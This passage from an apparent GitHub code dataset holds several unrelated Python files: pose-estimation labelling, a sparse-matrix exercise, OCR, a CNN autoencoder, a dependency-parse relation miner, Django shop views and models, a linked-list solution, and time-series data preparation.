paths.\n\n Returns:\n List[np.ndarray]: Filtered PifPaf arrays.\n\n \"\"\"\n\n # Order the bounding boxes by distance from the center of the image(default)\n def order_bbox(image_size, bbox_list, only_horizontal=False, only_vertical=False):\n distances = []\n image_height, image_width = image_size\n center_x = image_width // 2\n center_y = image_height // 2\n\n for i, bbox in enumerate(bbox_list):\n x1, y1, x2, y2 = bbox\n bbox_center_x = (x1 + x2) // 2\n bbox_center_y = (y1 + y2) // 2\n distance = bbox_center_x if only_horizontal else bbox_center_y if only_vertical else np.sqrt(\n (bbox_center_x - center_x) ** 2 + (bbox_center_y - center_y) ** 2)\n distances.append((i, distance))\n distances = sorted(distances, key=lambda x: x[1])\n return distances\n\n # Filter segmentations masks based on class and distance from the center of the image\n def filter_masks(results):\n image_size = results[0][\"instances\"].image_size\n pred_boxes, scores, pred_classes, pred_masks = results[0][\"instances\"].get_fields().values()\n if len(pred_masks) == 0:\n raise Exception(\"Error: Pifpaf model did not return any masks!\")\n\n # Filter out all masks that are not person\n filtered_boxes, filtered_masks = zip(\n *[(box.cpu().numpy(), mask.cpu().numpy()) for box, mask, cls in\n zip(pred_boxes, pred_masks, pred_classes) if cls == 0])\n\n # Order the masks by bbox distance to the center of the image\n distances = order_bbox(image_size, filtered_boxes)\n filtered_masks = [filtered_masks[i] for i, _ in distances]\n\n return filtered_masks\n\n # Filter PifPaf array using segmentation mask\n def filter_pifpaf_with_mask(pifpaf_array, mask, is_resize_pifpaf=False, interpolation=cv2.INTER_CUBIC):\n if is_resize_pifpaf:\n # Resize the PifPaf array to match the size of the mask\n 
pifpaf_resized = np.transpose(pifpaf_array, (1, 2, 0))\n pifpaf_resized = cv2.resize(pifpaf_resized, dsize=(mask.shape[1], mask.shape[0]),\n interpolation=interpolation)\n pifpaf_resized = np.transpose(pifpaf_resized, (2, 0, 1))\n\n # Filter the PifPaf array using the segmentation mask\n filtered_pifpaf = mask * pifpaf_resized\n filtered_pifpaf = np.array(\n [cv2.resize(slice, (9, 17), interpolation=cv2.INTER_CUBIC) for slice in filtered_pifpaf])\n\n return filtered_pifpaf\n # Resize the mask to match the size of the PifPaf array\n mask_resized = cv2.resize(mask.astype(np.uint8), (pifpaf_array.shape[2], pifpaf_array.shape[1]))\n filtered_pifpaf = mask_resized * pifpaf_array\n return filtered_pifpaf\n\n # Get the masks from the PifPaf predictions\n masks = filter_masks(self.model(batch))\n\n # Load the PifPaf label arrays\n pifpaf_labels = [np.load(pifpaf_file_path) for pifpaf_file_path in pifpaf_file_paths]\n\n # Filter the PifPaf arrays using the masks\n pifpaf_filtered = [filter_pifpaf_with_mask(pifpaf_label, mask) for pifpaf_label, mask in\n zip(pifpaf_labels, masks)]\n\n return pifpaf_filtered\n\n\ndef main():\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument('-s', '--source', type=str, required=True,\n help='Source dataset containing image files')\n parser.add_argument('--maskrcnn-cfg-file', type=str, default=\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\",\n help='Configuration file for the Mask R-CNN model')\n parser.add_argument('--pifpaf-model-name', type=str, default=\"shufflenetv2k16\",\n help='Name of the PifPaf model')\n parser.add_argument('-b', '--batch-size', type=int,\n help='Batch size for processing images')\n parser.add_argument('--num-workers', type=int,\n help='Number of worker processes for data loading')\n args = parser.parse_args()\n\n # Get image paths\n img_paths = get_image_paths(args.source)\n\n # Perform PifPaf processing\n pifpaf_model = BatchPifPaf(model_name=args.pifpaf_model_name,\n batch_size=args.batch_size,\n workers=args.num_workers)\n pifpaf_model(imagery=img_paths, dataset_dir=args.source, is_overwrite=False)\n\n # Perform Mask R-CNN processing\n mask_model = BatchMask(cfg=args.maskrcnn_cfg_file,\n batch_size=args.batch_size,\n workers=args.num_workers)\n mask_model(imagery=img_paths, dataset_dir=args.source, is_overwrite=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"VlSomers/bpbreid","sub_path":"scripts/get_labels.py","file_name":"get_labels.py","file_ext":"py","file_size_in_byte":21391,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"57"} +{"seq_id":"30852160123","text":"# Q.43 A sparse matrix has many zero elements. \r\n# For example, the following 4x4 matrix is a sparse Matrix. \r\n# Conventional method of representation of such a matrix is not space efficient. \r\n# It will be prudent to store non-zero elements only. \r\n# If this is done, then the matrix may be thought of as an ordered list of non-zero elements. \r\n# Information about non-zero elements have three parts. 
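The default branch above goes the other way: it resizes the mask down to the confidence fields instead of resizing the fields up to the mask. A minimal standalone sketch of that path, with illustrative shapes:

import cv2
import numpy as np

fields = np.random.rand(36, 17, 9).astype(np.float32)  # (channels, H, W) confidence fields
mask = np.zeros((480, 270), dtype=np.uint8)            # person mask at image resolution
mask[100:400, 60:220] = 1

# cv2.resize takes dsize as (width, height), hence the swapped indices
mask_small = cv2.resize(mask, (fields.shape[2], fields.shape[1]))
filtered = fields * mask_small  # broadcasts the 2-D mask over all channels
assert filtered.shape == fields.shape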
Row, Column and its value.\r\n# Examples:\r\n# Input:\r\n# 1 0 0 0\r\n# 0 5 0 2\r\n# 3 0 0 0\r\n# 0 0 4 0\r\n# Output:\r\n# row\tcolumn\tvalue\r\n# 0\t 0\t 1 \r\n# 1\t 1\t 5\r\n# 1\t 3\t 2\r\n# 2 0\t 3\r\n# 3\t 2 \t 4 \r\n# Input:\r\n# 1 0 0\r\n# 0 5 0\r\n# 0 0 0\r\n# 0 0 6\r\n# Output:\r\n# row\tcolumn\tvalue\r\n# 0\t 0\t 1 \r\n# 1\t 1\t 5\r\n# 3\t 2\t 6\r\n# note: you may assume row and column index starting from 0,0.\r\n\r\nmatrix = []\r\nprint('Enter list (one element at a time)')\r\nwhile True:\r\n row = input(\"-> \")\r\n if not row: break\r\n matrix.append(list(map(int, row.split())))\r\nprint('row','| column','| value')\r\n\r\nfor i in range(len(matrix)):\r\n for j in range(len(matrix[0])):\r\n if matrix[i][j]:\r\n print(i,j,matrix[i][j],sep=' ')","repo_name":"k-e-s-h-a-v/albanero-hackweek","sub_path":"Day-5/Q43.py","file_name":"Q43.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1501093987","text":"#!/usr/bin python3\n\nfrom PIL import Image\n\n# https://github.com/madmaze/pytesseract\n# https://github.com/tesseract-ocr/tesseract\n# https://pypi.org/project/pytesseract/\nimport pytesseract\nimport sys\nfrom plyer import notification\n\n\ndef write_file(src, text):\n with open(src, \"w\") as f:\n f.write(text)\n\n\ndef extract_text_from_image(src):\n try:\n text = pytesseract.image_to_string(Image.open(src), lang=\"eng\")\n write_file(\"./output.txt\", text)\n\n notification.notify(\n title=\"Finished executing \" + sys.argv[0],\n message=\"Successful, See ./output.txt\",\n )\n except Exception as e:\n notification.notify(\n title=\"Finished executing \" + sys.argv[0],\n message=\"Failed\",\n )\n raise e\n\n\ndef main(argv=sys.argv[1:]):\n src = argv[0]\n extract_text_from_image(src)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"krmmzs/scripts","sub_path":"myscripts/Extract_Text_from_Image.py","file_name":"Extract_Text_from_Image.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"6170872124","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :DGTD_LSTM \n@File :autoencoder_dfnn.py\n@Date :3/28/2022 7:59 PM\n\"\"\"\nimport torch\nimport torch.nn as nn\n\n\nclass AutoencoderCnn(nn.Module):\n \"\"\"\n AutoencoderCnn net model\n \"\"\"\n\n def __init__(self, n, statistics):\n super(AutoencoderCnn, self).__init__()\n self.statistics = statistics\n self.encoder = nn.Sequential(\n # (16, 16, 1) ---> (16, 16, 8)\n nn.Conv2d(in_channels=1, out_channels=8, kernel_size=(5, 5), padding=2, stride=1),\n nn.BatchNorm2d(8),\n nn.ELU(),\n # (16, 16, 8) ---> (8, 8, 16)\n nn.Conv2d(in_channels=8, out_channels=16, kernel_size=(5, 5), padding=2, stride=2),\n nn.BatchNorm2d(16),\n nn.ELU(),\n # (8, 8, 16) ---> (4, 4, 32)\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=(5, 5), padding=2, stride=2),\n nn.BatchNorm2d(32),\n nn.ELU(),\n # (4, 4, 32) ---> (2, 2, 64)\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(5, 5), padding=2, stride=2),\n nn.BatchNorm2d(64),\n nn.ELU(),\n # (2, 2, 64) --->N_h\n nn.Flatten(),\n nn.Linear(256, 256),\n nn.ELU(),\n nn.Linear(256, 256),\n nn.ELU(),\n # 256 ---> n\n nn.Linear(256, n),\n nn.Sigmoid()\n )\n self.decoder = nn.Sequential(\n # 2 ---> 256\n nn.Linear(n, 256),\n nn.ELU(),\n nn.Linear(256, 256),\n nn.ELU(),\n nn.Linear(256, 256),\n nn.ELU(),\n # 256 ---> (2, 2, 64)\n nn.Unflatten(1, (64, 2, 2)),\n # (2, 2, 
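The triplet (row, column, value) form is lossless once the matrix shape is known. A short sketch of the inverse mapping (the helper name is illustrative):

def to_dense(triplets, n_rows, n_cols):
    dense = [[0] * n_cols for _ in range(n_rows)]
    for r, c, v in triplets:
        dense[r][c] = v
    return dense

triplets = [(0, 0, 1), (1, 1, 5), (1, 3, 2), (2, 0, 3), (3, 2, 4)]  # first example above
assert to_dense(triplets, 4, 4)[1][3] == 2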
64) ---> (4, 4, 64) // 2p = s+1\n nn.ConvTranspose2d(in_channels=64, out_channels=64, kernel_size=(5, 5), padding=1, stride=1),\n nn.BatchNorm2d(64),\n nn.ELU(),\n # (4, 4, 64) ---> (8, 8, 32) // 3(s-1) = 2p\n nn.ConvTranspose2d(in_channels=64, out_channels=32, kernel_size=(5, 5), padding=0, stride=1),\n nn.BatchNorm2d(32),\n nn.ELU(),\n # (8, 8, 32) ---> (16, 16, 16) // 7s-2p=11\n nn.ConvTranspose2d(in_channels=32, out_channels=16, kernel_size=(5, 5), padding=5, stride=3),\n nn.BatchNorm2d(16),\n nn.ELU(),\n # (16, 16, 16) ---> (16, 16, 8) // 15s-2p=11\n nn.ConvTranspose2d(in_channels=16, out_channels=8, kernel_size=(5, 5), padding=2, stride=1),\n nn.BatchNorm2d(8),\n nn.ELU(),\n # nn.Dropout2d(p=0.2),\n # (16, 16, 8) ---> (16, 16, 1) // 15s-2p=11\n nn.ConvTranspose2d(in_channels=8, out_channels=1, kernel_size=(5, 5), padding=2, stride=1),\n nn.BatchNorm2d(1),\n nn.Sigmoid()\n )\n\n def forward(self, _x: torch.Tensor, type: int):\n \"\"\"\n :param _x:\n :param type:\n 0 train autoencoder\n 1 get dfnn label\n 2 get res\n :return:\n \"\"\"\n if type == 0:\n return self.decoder(self.encoder(_x))\n elif type == 1:\n return self.encoder(_x)\n else:\n return self.decoder(_x)\n\n\nclass Dfnn(nn.Module):\n \"\"\" Deep Forward nn\n \"\"\"\n def __init__(self, n):\n super(Dfnn, self).__init__()\n self.dfnn = nn.Sequential(\n nn.Linear(2, 64),\n nn.ReLU(),\n nn.Linear(64, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 64),\n nn.ReLU(),\n nn.Linear(64, n),\n nn.Sigmoid()\n )\n\n def forward(self, _x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param _x:\n :return:\n \"\"\"\n return self.dfnn(_x)\n","repo_name":"Xiang3999/DGTD_LSTM","sub_path":"Net/autoencoder_dfnn.py","file_name":"autoencoder_dfnn.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"16507724493","text":"import re\n\nimport nltk\nimport helper\nfrom nltk.corpus import stopwords\nfrom pycorenlp import StanfordCoreNLP\nimport json\n\nclass relation_miner():\n def __init__(self, stanfordCoreNLP):\n self.stanfordCoreNLP = stanfordCoreNLP\n\n def getProperText(self, text):\n pattern = re.compile(r'\\b(' + r'|'.join(stopwords.words('english')) + r')\\b\\s*')\n text = pattern.sub('', text)\n # print(text)\n return text\n\n def depparse(self, text):\n output = self.stanfordCoreNLP.annotate(text, properties={\n 'annotators': 'depparse',\n 'outputFormat': 'json'\n })\n\n parsed = []\n for i in output[\"sentences\"]:\n current_parsed = []\n # for j in i[\"basicDependencies\"]:\n for j in i[\"enhancedPlusPlusDependencies\"]:\n # exm: 1st sentence> [('ROOT', 'ROOT', 'eat'), ('nsubj', 'eat', 'I'), ('dobj', 'eat', 'chicken'), ('punct', 'eat', '.')]\n # 2nd sentence> [('ROOT', 'ROOT', 'love'), ('nsubj', 'love', 'I'), ('dobj', 'love', 'chicken'), ('punct', 'love', '.')]\n current_parsed.append(tuple((j['dep'], j['governorGloss'], j['dependentGloss'])))\n # parsed example:\n # [\n # [('ROOT', 'ROOT', 'eat'), ('nsubj', 'eat', 'I'), ('dobj', 'eat', 'chicken'), ('punct', 'eat', '.')],\n # [('ROOT', 'ROOT', 'love'), ('nsubj', 'love', 'I'), ('dobj', 'love', 'chicken'), ('punct', 'love', '.')]\n # ]\n parsed.append(current_parsed)\n return parsed\n\n def get_important_relations(self, dep_tree, sentence):\n extracted_words = dict()\n what_bagofwords = set()\n where_bagofwords = set()\n where_attribute_bagofwords = set()\n how_bagofwords = set()\n why_bagofwords = 
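The size equations in the decoder comments ("2p = s+1", "7s-2p=11", and so on) all come from the ConvTranspose2d output rule out = (in - 1) * s - 2p + k. A quick check of the (8, 8) -> (16, 16) stage from the decoder above:

import torch
import torch.nn as nn

def deconv_out(n_in, k, s, p):
    return (n_in - 1) * s - 2 * p + k  # dilation 1 and output_padding 0 assumed

# (8, 8) -> (16, 16): (8 - 1) * 3 - 2 * 5 + 5 = 16, i.e. the "7s-2p=11" comment
assert deconv_out(8, k=5, s=3, p=5) == 16
layer = nn.ConvTranspose2d(32, 16, kernel_size=(5, 5), padding=5, stride=3)
assert layer(torch.zeros(1, 32, 8, 8)).shape == (1, 16, 16, 16)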
set()\n when_bagofwords = set()\n subject_bagofwords = set()\n action_bagofwords = set()\n\n for node in dep_tree[0]:\n # print(node)\n self.get_relation(node, 'dobj', what_bagofwords, where_bagofwords)\n # if node[0] == 'dobj':\n # action_bagofwords.add(verb+\" \"+obj)\n\n self.get_relation(node, 'nsubj',\n what_bagofwords,\n subject_bagofwords)\n\n self.get_relation(node, 'nmod:on',\n what_bagofwords,\n where_attribute_bagofwords)\n\n self.get_relation(node, 'nmod:in',\n where_attribute_bagofwords,\n where_attribute_bagofwords)\n\n self.get_relation(node, 'advcl:to',\n what_bagofwords,\n why_bagofwords)\n\n self.get_relation(node, 'compound',\n where_bagofwords,\n where_bagofwords)\n\n self.get_relation(node, 'nsubjpass',\n where_bagofwords,\n where_bagofwords)\n\n self.get_relation(node, 'nmod:agent',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:from',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:to',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:with',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:via',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:over',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:for',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:via',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:through',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:using',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:into',\n where_bagofwords,\n where_bagofwords)\n\n # what_bafofwords.append(verb)\n # where_bagofwords.append(obj)\n extracted_words['what'] = helper.remove_stopwords(what_bagofwords)\n extracted_words['where'] = helper.remove_stopwords(where_bagofwords)\n extracted_words['where_attribute'] = helper.remove_stopwords(where_attribute_bagofwords)\n extracted_words['why'] = helper.remove_stopwords(why_bagofwords)\n extracted_words['when'] = helper.remove_stopwords(when_bagofwords)\n extracted_words['how'] = helper.remove_stopwords(how_bagofwords)\n extracted_words['subject'] = helper.remove_stopwords(subject_bagofwords)\n extracted_words['action'] = helper.remove_stopwords(action_bagofwords)\n extracted_words['text'] = sentence\n\n\n return extracted_words\n\n def get_relation(self, node, relation_type, *argv):\n # print(node)\n if node[0] == relation_type:\n k = 1\n for arg in argv:\n # print(arg)\n arg.add(node[k])\n k += 1\n # print(arg)\n # print(node[1], node[2])\n return node[1], node[2]\n\n def list_important_info(self, text):\n\n dep_parse_tree = self.depparse(text)\n # print(dep_parse_tree)\n important_dict = self.get_important_relations(dep_parse_tree, text)\n return important_dict\n\n def all_imp_stuff(self, text):\n ourput_list = list()\n for sent in text:\n print(sent)\n dict_ = self.list_important_info(sent)\n print(dict_)\n ourput_list.append(dict_)\n\n return ourput_list\n\n def get_important_relations_new(self, list_of_tuples, sentence):\n list_of_forest = []\n for tuples in list_of_tuples:\n nodes = {}\n forest = []\n for count1 in tuples:\n print(count1)\n # count1:\n # ('ROOT', 'ROOT', 'eat')\n # ('nsubj', 'eat', 'I')\n # ('dobj', 'eat', 'chicken')\n # ('punct', 'eat', '.')\n rel, parent, child = count1\n # nodes[child]\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n # {'Name': 'I', 'Relationship': 'nsubj'}\n # {'Name': 'chicken', 'Relationship': 'dobj'}\n # {'Name': '.', 'Relationship': 'punct'}\n\n # if rel 
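Further down, get_important_relations_new turns (relation, governor, dependent) triples into a forest of nested dicts. A condensed sketch of that two-pass construction, using the "I eat chicken" triples from the comments:

def build_forest(triples):
    # pass 1: one dict per dependent token; pass 2: attach each under its governor
    # (like the original, this assumes each token appears once per sentence)
    nodes = {child: {"Name": child, "Relationship": rel} for rel, _, child in triples}
    forest = []
    for rel, parent, child in triples:
        if parent == "ROOT":
            forest.append(nodes[child])
        else:
            nodes[parent].setdefault("children", []).append(nodes[child])
    return forest

triples = [("ROOT", "ROOT", "eat"), ("nsubj", "eat", "I"), ("dobj", "eat", "chicken")]
forest = build_forest(triples)
assert forest[0]["Name"] == "eat" and len(forest[0]["children"]) == 2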
in ['dobj','amod','compound']:\n # print(count1)\n # nodes[parent] = {'Name': parent, 'Relationship': rel}\n nodes[child] = {'Name': child, 'Relationship': rel}\n\n for count2 in tuples:\n # count2\n # ('ROOT', 'ROOT', 'eat')\n # ('nsubj', 'eat', 'I')\n # ('dobj', 'eat', 'chicken')\n # ('punct', 'eat', '.')\n rel, parent, child = count2\n # node\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n # {'Name': 'I', 'Relationship': 'nsubj'}\n # {'Name': 'chicken', 'Relationship': 'dobj'}\n # {'Name': '.', 'Relationship': 'punct'}\n # if rel in ['dobj', 'amod', 'compound']:\n # print(count2)\n node = nodes[child]\n\n if parent == 'ROOT':\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n forest.append(node)\n else:\n # parent\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n # {'Name': 'eat', 'Relationship': 'ROOT', 'children': [{'Name': 'I', 'Relationship': 'nsubj'}]}\n # {'Name': 'eat', 'Relationship': 'ROOT', 'children': [{'Name': 'I', 'Relationship': 'nsubj'}, {'Name': 'chicken', 'Relationship': 'dobj'}]}\n parent = nodes[parent]\n if not 'children' in parent:\n parent['children'] = []\n children = parent['children']\n children.append(node)\n\n list_of_forest.append(forest)\n\n print('---------------------------------------')\n print(list_of_forest)\n print(list_of_tuples)\n # for relation in dep_tree[0]:\n # if relation[0] == 'dobj':\n #\n # print(relation)\n return\n\ndef test():\n from helper import FileReader\n from helper import StanfordServer\n isFile = True\n isStemmer = False\n isServerRestart = False\n report_name = 'reports/test.txt'\n preprocess_tools = FileReader(report_name)\n text = preprocess_tools.read_file()\n text_list = preprocess_tools.get_sent_tokenize(text)\n stanfordServer = StanfordServer()\n if isServerRestart:\n stanfordServer.startServer()\n stanfordNLP = stanfordServer.get_stanforcorenlp()\n print(text_list)\n # extracted_list = getReportExtraction(isFile, isStemmer, isServerRestart, report_name)\n # print(extracted_list)\n nlp_extract = relation_miner(stanfordNLP)\n extracted_list = nlp_extract.all_imp_stuff(text_list)\n print(extracted_list)\n\ndef tree_example():\n from anytree import Node, RenderTree\n\n udo = Node(name='nsubj')\n marc = Node(name='dobj', parent=udo)\n lian = Node(parent=marc, name='amod')\n dan = Node(parent=udo, name='nmod:for')\n jet = Node(parent=dan, name='nsubj')\n jan = Node(parent=dan, name='compound')\n joe = Node(parent=dan, name='det')\n\n print(udo)\n Node('/Udo')\n print(joe)\n Node('/Udo/Dan/Joe')\n\n for pre, fill, node in RenderTree(udo):\n print(\"%s%s%s\" % (pre, node.name, fill))\n\n print(dan.children)\n (Node('/Udo/Dan/Jet'), Node('/Udo/Dan/Jan'), Node('/Udo/Dan/Joe'))\n\nif __name__=='__main__':\n test()\n\n","repo_name":"KaiLiu-Leo/TTPDrill-0.5","sub_path":"relation_miner.py","file_name":"relation_miner.py","file_ext":"py","file_size_in_byte":10439,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"57"} +{"seq_id":"29906235199","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.http import HttpResponse\nfrom django.utils.http import urlencode\nfrom django.conf import settings\nfrom .models import Product, Order, Product_Order, Receipt\nfrom datetime import datetime, timedelta\n\nclass CartView(View):\n def get(self, request):\n cart_product = request.COOKIES.get('cart')\n cart_list = cart_product.split(',') if cart_product else []\n number_of_product = {}\n\n for key in cart_list:\n if key in number_of_product:\n number_of_product[key] += 1\n 
else:\n number_of_product[key] = int(1)\n products = []\n\n for key, value in number_of_product.items():\n try:\n product = Product.objects.get(id=int(key))\n if product.discount:\n total_price = float(f'{product.discount_to_price * value:.2f}')\n else:\n total_price = float(f'{product.price * value:.2f}')\n products.append({'product': product, 'quantity': value, 'name': product.name,\n 'price': product.price, 'category': product.category,\n 'discount': product.discount, 'total': product.discount_to_price,\n 'total_price':total_price, 'id':product.id, 'image': product.image_src})\n total_price_sum = sum(product['total_price'] for product in products)\n except Product.DoesNotExist:\n pass\n return render(request, 'cart_page.html', {'products': products, 'total_price_sum': f'{total_price_sum:.2f}'})\n\n\n def post(self, request):\n\n print(*request)\n return redirect('cart.html')\n\nclass ReceiptView(View):\n def get(self, request):\n return render(request, 'inc/receipt.html')\n def post(self, request):\n cart_product = request.COOKIES.get('cart')\n cart_list = cart_product.split(',') if cart_product else []\n number_of_product = {}\n\n for key in cart_list:\n if key in number_of_product:\n number_of_product[key] += 1\n else:\n number_of_product[key] = int(1)\n products = []\n\n for key, value in number_of_product.items():\n product = Product.objects.get(id=int(key))\n if product.discount:\n total_price = round(product.discount_to_price * value, 2)\n else:\n total_price = round(product.price * value, 2)\n products.append({'quantity': value, 'total': product.discount_to_price,\n 'total_price': total_price, 'id': product.id})\n total_price_sum = sum(product['total_price'] for product in products)\n\n order = Order.objects.create(status=Order.OrderStatus.Pending)\n order_id = order.id\n\n for product in products:\n Product_Order.objects.create(product_id=product['id'], order_id=order_id,\n number=product['quantity'], price=total_price_sum)\n\n Receipt.objects.create(order_id=order_id, total_price=total_price_sum, final_price=total_price_sum)\n\n return render(request, 'inc/receipt.html', {'products': products, 'order_id': order_id})\n \n \n\n\n\n\n\nclass RemoveFromCartView(View):\n def post(self, request, product_id):\n cart_items = CartView.get_cart_items(request)\n\n for i, item in enumerate(cart_items):\n if item['id'] == product_id:\n del cart_items[i]\n break\n\n response = HttpResponse()\n response = CartView.set_cart_items(response, cart_items)\n\n return response\n\n","repo_name":"Mohammadhp7878/Cafe_project","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70794961780","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nclass Exam(models.Model):\n\t\"\"\"Examination model\"\"\"\n\t\n\tclass Meta(object):\n\t\tverbose_name = _(u\"Exam\")\n\t\tverbose_name_plural = _(u\"Exams\")\n\n\tsubject = models.CharField(\n\t\tmax_length=256,\n\t\tblank=False,\n\t\tverbose_name=_(u\"Subject title\")\n\t)\n\n\ttime = models.DateTimeField(\n\t\tverbose_name=_(u\"Date and time\"),\n\t\tblank=False,\n\t\tnull=True\n\t)\n\n\tteacher = models.CharField(\n\t\tmax_length=256,\n\t\tblank=False,\n\t\tverbose_name=_(u\"Teacher\")\n\t)\n\n\tfor_group = models.ForeignKey('Group',\n\t\tverbose_name=_(u\"Group\"),\n\t\tblank=False\n\t)\n\n\tdef 
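The manual quantity dict in CartView.get is equivalent to collections.Counter over the cookie's comma-separated product ids. A compact sketch (the cookie value is illustrative):

from collections import Counter

cart_cookie = "3,7,3,3,12"  # illustrative 'cart' cookie value
quantities = Counter(cart_cookie.split(",")) if cart_cookie else Counter()
assert quantities["3"] == 3 and quantities["12"] == 1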
__unicode__(self):\n\t\treturn u\"%s - %s (%s)\" % (self.subject, self.for_group.title, self.teacher)\n","repo_name":"landrew31/students-system","sub_path":"students/models/exams.py","file_name":"exams.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30594014401","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \n\n dummy=ListNode(0,head)\n prev=dummy\n while prev.next and prev.next.next:\n a,b=prev.next,prev.next.next\n temp= a\n prev.next = b\n a.next,b.next=b.next,a\n prev=temp\n return dummy.next\n","repo_name":"nermeenwageh10/Leetcode-Solutions","sub_path":"Solutions/python3/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"57"} +{"seq_id":"29220702017","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('signup', views.signupUsers, name='signupusers'),\n path('home', views.home, name='ups-home'),\n path('profile', views.profile, name='ups-profile'),\n path('login', views.loginUsers, name='loginusers'),\n path('package', views.packageList, name='ups-package'),\n path('showpackage', views.onepackage, name='ups-onepackage'),\n path('searchpackage', views.searchPackage, name='search-package'),\n path('searchresult', views.searchResult, name='search-result'),\n path('feedback', views.feedback, name='ups-feedback'),\n path('submitfeedback', views.submitFeedback, name='ups-submitfeedback'),\n path('viewfeedback', views.viewFeedback, name='ups-viewfeedback'),\n path('update', views.update, name='ups-update'),\n path('', views.trackpackage, name = 'ups-track'),\n path('trackresult', views.trackResult, name = 'ups-trackresult'),\n path('calculate', views.calculate, name = 'ups-calculate'),\n path('cost', views.cost, name='ups-cost'),\n]\n","repo_name":"Zheyezainidesuanjizhizhongma/Mini_UPS-Delivery-website","sub_path":"ups_frontend/web-app/ups_front/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"13239212964","text":"### Estructuracion de los datos para entrenamientos en modelos que no son intrinsecamente de series temporales (distintos al Prophet):\nimport os\nimport pandas as pd\nimport numpy as np \n\n#Leo los datos de vehiculos y feriados y los junto\ndatos = pd.read_csv(os.path.join('Datos', 'Insumos_prophet', 'df_prophet_entero.csv'))\nferiados = pd.read_csv(os.path.join('Datos', 'Insumos_prophet', 'feriados.csv'))\ndatos['dia'] = [dia[0:10] for dia in datos['ds']]\ndatos = datos.merge(feriados, how = \"left\", left_on = 'dia', right_on = 'ds')\n\n#Reformateo columnas relacionadas al tiempo\ndatos['ds_x'] = pd.to_datetime(datos['ds_x'])\ndatos['hora'] = datos['ds_x'].dt.hour\ndatos['dia_semana'] = datos['ds_x'].dt.dayofweek\ndatos['mes'] = datos['ds_x'].dt.month\ndatos['anio'] = datos['ds_x'].dt.year\n\n#One hot encoding de las columnas de feriados:\ndatos = datos.drop(['ds_y', 'dia', 'es_semana'], axis = 1)\ndatos['valor'] = ~pd.isna(datos['holiday'])\ndatos = pd.pivot(datos, index = ['ds_x', 'y', 'precipitaciones', 'temperatura', 'es_finde', 'hora', 'dia_semana', 'mes', 'anio'], columns = 'holiday', values = 
'valor').reset_index()\ndatos[np.unique(feriados['holiday'])] = datos[np.unique(feriados['holiday'])].fillna(False)\ndatos = datos.loc[:, datos.columns.notna()]\n\n# Cambio el valor de vehiculos a 10**vehiculos\ndatos['y'] = 10**datos['y']\ndatos = datos.rename(columns = {\"ds_x\":\"ds\"})\ndatos = datos.sort_values(['ds'])\n\n\"\"\"\"\n#Busco los valores medianos (evitando outliers) de cada hora-dia de la semana\nmedianas = datos.groupby(['dia_semana', 'hora'])[['y']].median().reset_index().rename({'y': 'y_mediana'}, axis = 1)\n\n#Los uno a los datos:\ndatos = datos.merge(medianas, on = ['dia_semana', 'hora'])\ndatos = datos.sort_values(['ds'])\n\n#Calculo la diferencia entre el valor mediano y el valor observado y borro la columna mediana:\ndatos['y_diff_mediana'] = datos.y_mediana - datos.y\ndatos = datos.drop(['y_mediana'], axis = 1)\n\n#Creo variables laggeadas de la diferencia con la mediana de la ultima semana (cada hora):\ndatos_lag = pd.DataFrame()\nfor i in [1, 8, 12, 24, 24*7]:#range(24*7, 0, -1):\n datos_lag['y_diff_mediana_lag_' + str(i)] = datos.y_diff_mediana.shift(i)\ndatos = 